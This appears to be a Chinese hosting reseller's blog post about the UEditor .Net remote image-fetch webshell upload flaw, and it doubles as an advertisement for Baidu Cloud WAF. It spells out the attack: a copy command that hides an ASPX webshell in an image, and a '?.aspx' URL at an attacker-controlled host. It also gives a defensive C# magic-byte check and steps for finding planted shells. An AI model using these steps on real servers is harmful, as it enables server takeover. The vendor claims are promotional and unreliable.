一款由百度开发、曾经遍地开花的富文本编辑器,一个隐藏了多年的任意文件上传漏洞,无数网站因此被植入后门——这就是UEditor .Net版本的“抓取图片Getshell”漏洞。今天咱们就来扒一扒这个漏洞是怎么回事,以及如何用百度云防护WAF轻松防住它。
一、 漏洞背景:UEditor .Net版本为什么有坑?
UEditor是百度FEX前端研发团队开发的一款开源富文本编辑器,轻量、可定制、用户体验好,曾经被大量网站和CMS系统集成。然而,就是这个“出身名门”的编辑器,在.Net版本中埋下了一个严重的安全隐患。
影响范围
- 受影响版本:UEditor 1.4.3.3、1.5.0等.Net版本
- 其他版本:php、jsp、asp版本不受此漏洞影响
- 用户分布:国内有超过5000家网站在使用UEditor,包括大量政府、高校、知名企业
漏洞编号
- 该漏洞被收录为 CNVD-2017-20077,多家安全厂商已内置防护规则
二、 漏洞原理:只验Content-Type,不验文件内容
这个漏洞的成因其实很简单:UEditor在处理远程图片抓取功能时,仅检查了HTTP头中的Content-Type,而没有对实际文件内容进行校验。
漏洞代码位置
问题出在 net/App_Code/CrawlerHandler.cs 文件中。当UEditor进入“catchimage”分支抓取远程图片时,调用了这个类来处理。
攻击者如何绕过?
- 准备图片马:攻击者先在自己服务器上准备一个“图片马”,比如用命令将正常图片和一句话木马合并:
copy 2.jpg/b + shell.aspx/a 1.jpg- 伪造Content-Type:攻击者通过修改HTTP请求,使Content-Type显示为图片类型(如image/jpeg)。
- 利用?.aspx绕过:在提交的图片地址末尾加上 ?.aspx,例如
http://攻击者IP/1.jpg?.aspx。 - 触发上传:UEditor仅验证了Content-Type,认为这是合法图片,于是将文件下载到服务器,并保存为.aspx后缀。
最终,攻击者的Webshell被成功上传到服务器,可以直接执行任意命令,服务器就此沦陷。
三、 漏洞危害:服务器权限直接丢失
这个漏洞被评为高风险,一旦被利用,后果相当严重:
| 危害类型 | 具体后果 |
|---|---|
| 服务器控制权丢失 | 攻击者可上传Webshell,执行任意系统命令 |
| 数据泄露 | 黑客可读取数据库、下载敏感文件 |
| 内网横向渗透 | 失陷服务器成为跳板,进一步攻击内网其他系统 |
| 网页篡改 | 插入赌博、色情等非法内容,导致网站被封 |
| 持续后门 | 即使修复漏洞,已上传的后门可能仍潜伏在服务器中 |
实战案例:在某次攻防演练中,攻击者通过UEditor漏洞成功上传Webshell,获取了目标服务器的完整控制权限,进而渗透到内网核心系统。
四、 怎么防?三层防御策略
第一层:代码修复(治本)
最根本的解决方法是修改UEditor源码,增加对文件内容的严格校验:
- 修改文件:
net/App_Code/CrawlerHandler.cs - 增加文件头校验:读取远程文件的前几个字节(魔数),判断是否为真实的图片格式
参考代码示例:
static bool IsImage(HttpWebResponse response)
{
using (Stream responseStream = response.GetResponseStream())
{
byte[] buffer = new byte[8];
int bytesRead = responseStream.Read(buffer, 0, buffer.Length);
// 校验JPEG文件头 (FF D8 FF)
if (bytesRead >= 3 && buffer[0] == 0xFF && buffer[1] == 0xD8 && buffer[2] == 0xFF)
return true;
// 校验PNG文件头 (89 50 4E 47 0D 0A 1A 0A)
if (bytesRead >= 8 && buffer[0] == 0x89 && buffer[1] == 0x50 && buffer[2] == 0x4E)
return true;
return false;
}
}第二层:安全产品防护(快速有效)
如果你不想折腾代码,或者无法立即更新系统,部署Web应用防火墙(WAF)是最快捷有效的选择。
主流WAF产品已内置该漏洞的防护规则:
- Hillstone Networks:Rule ID 1070210147
- 各大云厂商WAF:均已支持
第三层:自查清理(亡羊补牢)
检查服务器是否已被入侵:
- 查看上传目录(如
ueditor/net/upload/)是否有近期上传的.aspx、.asp、.ashx等危险文件 - 使用D盾等工具扫描Webshell
- 检查IIS日志,看是否有异常的上传请求
五、 为什么推荐百度云防护WAF?
作为百度云防护的官方合作伙伴,主机吧实测下来,百度云防护在防御UEditor漏洞方面有几个明显优势:
1. 内置该漏洞防御规则
从后台截图可以看到,百度云防护的WAF规则库中,UEditor .Net版本Getshell漏洞的防御规则(规则ID 3336)已默认开启。规则描述明确指出:”Ueditor .Net版本远程抓取漏洞”,可以精准拦截攻击载荷。
2. 不止防已知漏洞
百度云防护的规则库每月更新,除了UEditor漏洞,还覆盖OWASP Top 10、各类CMS漏洞、0Day漏洞等。即使你用的是老旧系统,也能通过“虚拟补丁”获得保护。
3. 防护效果好,误报率低
以去年闹得沸沸扬扬的“广东IP爬虫事件”为例,很多WAF束手无策,而百度云防护通过JA3指纹识别,实现了精准拦截。对于UEditor这类需要精确匹配漏洞特征的场景,百度云防护同样表现出色。
4. 套餐计费,不怕欠费
最让站长安心的一点:百度云防护采用套餐制,用完即停,不会因为被攻击而产生天价后付费账单。
六、 快速配置指南
如果你已经接入百度云防护WAF,只需两步即可开启UEditor漏洞防护:
- 登录控制台 → 进入【防护配置】→【Web防护】→【内置规则】
- 搜索规则ID 3336,确认其状态为“开启”且动作为“拦截”
如果规则未开启,点击编辑并设置为“拦截”即可。
七、 主机吧小结
UEditor .Net版本远程抓取图片漏洞是一个“历史悠久”但依然广泛存在的安全风险。很多老旧系统仍在用着有漏洞的版本,而开发者可能早已忘了这回事。
对于站长来说,修复代码固然是根本,但如果系统复杂、无法轻易改动,部署专业的WAF产品是最现实的选择。百度云防护WAF内置了该漏洞的防御规则,开箱即用,省心省力。
如果你还不确定自己的网站是否存在UEditor漏洞,或者想为服务器加上一道可靠的防线,欢迎联系主机吧。我们提供免费安全评估和配置指导,帮你把UEditor这个“老坑”填上。
主机吧 | 百度云防护官方合作伙伴
提供WAF接入、高防CDN、高防IP、SSL证书一站式服务
让每一个漏洞都无路可走,让每一台服务器都固若金汤。
